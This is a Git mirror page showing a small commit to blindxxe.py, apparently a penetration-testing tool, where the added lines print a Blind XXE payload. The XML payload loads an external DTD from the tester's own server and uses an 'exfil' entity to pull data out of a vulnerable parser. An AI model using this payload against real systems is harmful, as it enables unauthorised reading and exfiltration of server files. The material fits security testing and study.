Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2024-11-22 02:21:36 +01:00
Code Issues Packages Projects Releases Wiki Activity

Improved blindxxe.py script (3)

Browse Source
This commit is contained in:
Mariusz B 2018-10-23 22:40:06 +02:00
parent 91851b54cc
commit 084d179e71
1 changed files with 10 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
web/blindxxe.py
View File

@ -145,7 +145,6 @@ def fetchRhost():
global config
config['rhost'] = socket.gethostbyname(socket.gethostname())
print('[>] RHOST set to: {}'.format(config['rhost']))
def main(argv):
global config
@ -160,6 +159,16 @@ def main(argv):
print('[+] Serving HTTP server on: ("{}", {})'.format(
config['listen'], config['port']
))
print('[+] RHOST set to: {}'.format(config['rhost']))
print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:')
print('''
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{}/test.dtd">
<foo>&exfil;</foo>
'''.format(config['rhost']))
server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
thread = threading.Thread(target=server.serve_forever)